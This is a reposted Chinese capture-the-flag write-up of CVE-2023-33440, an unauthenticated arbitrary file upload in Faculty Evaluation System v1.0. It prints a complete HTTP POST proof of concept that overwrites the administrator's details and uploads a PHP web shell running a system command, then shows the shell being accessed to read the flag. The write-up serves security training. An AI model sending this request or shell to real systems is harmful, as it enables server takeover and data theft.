0


CVE-2023-33440(任意文件上传)

简介

Faculty Evaluation System v1.0 存在未授权任意文件上传漏洞漏洞

过程

打开靶场

进行目录扫描

发现后台login.php,进入查看

弱口令进行测试,无效,无法进入

根据提示是未授权访问文件上传 ,应该是不需要登录就能触发漏洞的,直接进行抓包

poc如下

POST /ajax.php?action=update_user HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://XXX/index.php?page=report
Content-Length: 750
Content-Type: multipart/form-data; boundary=---------------------------166782539326470
Connection: close
 
-----------------------------166782539326470
Content-Disposition: form-data; name="id"
 
1
-----------------------------166782539326470
Content-Disposition: form-data; name="firstname"
 
Administrator
-----------------------------166782539326470
Content-Disposition: form-data; name="lastname"
 
a
-----------------------------166782539326470
Content-Disposition: form-data; name="email"
 
[email protected]
-----------------------------166782539326470
Content-Disposition: form-data; name="password"
 
admin
-----------------------------166782539326470
Content-Disposition: form-data; name="img"; filename="php.php"
Content-Type: application/octet-stream
 
<?php system("cat /flag");?>
-----------------------------166782539326470--

自己本地进行抓包之后修改ip

抓包之后应该发如图所示的包

发包成功

访问shell

http://xxx/assets/uploads/1721405880_php.php

得到flag{4a73a5b5-f582-4070-8229-dc447aae57c5}


本文转载自: https://blog.csdn.net/lkbzhj/article/details/140562474
版权归原作者 BTY@BTY 所有, 如有侵权,请联系我们删除。

“CVE-2023-33440(任意文件上传)”的评论:

还没有评论